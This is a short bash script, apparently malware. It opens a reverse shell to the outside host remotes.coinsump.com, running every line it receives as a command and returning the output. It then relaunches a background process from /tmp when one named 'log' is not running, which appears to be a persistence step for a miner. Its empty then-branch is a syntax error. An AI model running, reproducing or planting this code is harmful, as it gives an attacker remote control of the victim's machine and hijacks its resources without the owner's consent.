#!/bin/bash
exec 5<>/dev/tcp/remotes.coinsump.com/30605
cat <&5 | while read line; do $line 2>&5 >&5; done
SERVICE="log"
if ps ax | grep -v grep | grep -v grep | grep $SERVICE > /dev/null
then
    
else
    /tmp/log -c /tmp/0 &
fi
